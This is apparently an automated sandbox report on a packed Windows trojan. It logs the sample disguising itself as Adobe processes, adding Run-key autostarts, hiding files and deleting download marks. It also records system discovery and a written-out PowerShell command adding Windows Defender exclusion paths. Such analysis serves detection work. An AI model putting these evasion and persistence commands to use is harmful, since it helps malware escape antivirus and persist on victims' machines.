Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220114

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drkkekrp.vde.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.adwa.evad.winEXE@232/30@0/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1904:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4432:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:720:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5616:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3932:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

String found in binary or memory: #/Add5

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Static file information: File size 1843200 > 1048576

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x1c1c00

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Static PE information: section name: UPX2

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\acrotray.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig //flushdns

Source: C:\Windows\System32\cmd.exe

PE file moved: C:\Windows\acrotray.exerd

Jump to behavior

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotray

Jump to behavior

Creates multiple autostart registry keys

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotray	Jump to behavior
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run sidebar

Uses whoami command line tool to query computer and username

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotray	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run acrotray	Jump to behavior
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run sidebar
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run sidebar
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM
Source: C:\Windows\acrotray.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 20000
Source: unknown	Network traffic detected: HTTP traffic on port 20000 -> 49751

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	File opened: C:\Windows\acrotray.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\acrotray.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe:Zone.Identifier read attributes \| delete
Source: C:\Windows\acrotray.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe:Zone.Identifier read attributes \| delete \| synchronize
Source: C:\Windows\acrotray.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe:Zone.Identifier read attributes \| delete
Source: C:\Windows\acrotray.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe:Zone.Identifier read attributes \| delete \| synchronize

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
